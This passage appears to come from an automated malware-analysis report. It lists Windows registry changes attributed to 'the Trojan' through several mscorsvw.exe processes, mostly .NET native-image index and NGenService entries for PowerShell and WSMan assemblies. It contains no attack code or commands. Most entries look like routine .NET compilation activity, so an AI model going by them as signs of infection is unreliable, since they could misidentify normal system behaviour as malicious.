"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 2A A3 BD 8F 9C C2 04 80 FB 4F AA AA A3 71 A1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "60 50 5C EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
The process mscorsvw.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D EE D5 6A F7 F8 C8 70 1B 65 FD 10 35 25 5F A2"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 3B C1 32 D2 4A 46 3F AF 15 8A BD 50 C7 5C F3"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "100"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
"Status" = "0"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
The process mscorsvw.exe:3068 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 82 E9 21 79 74 AF 45 A4 BA 60 99 EF 75 E0 F3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:2320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "02 AD DA EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 2E 63 64 29 E1 19 60 BB 16 A3 0B 46 88 2E 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]
The process mscorsvw.exe:524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "08 06 A8 F1 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 A9 0D AF 41 FE D0 66 89 30 D7 B7 36 F5 70 B8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
The process mscorsvw.exe:2152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 AF D3 C8 F0 C7 6C 59 00 F6 2A B5 BF FB 1E 95"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 27 4D 31 20 A3 4A 0B FB 10 9D 96 D0 03 84 D6"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 16 9C 48 B1 82 98 65 70 46 6E 3A F3 5D 66 9D"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
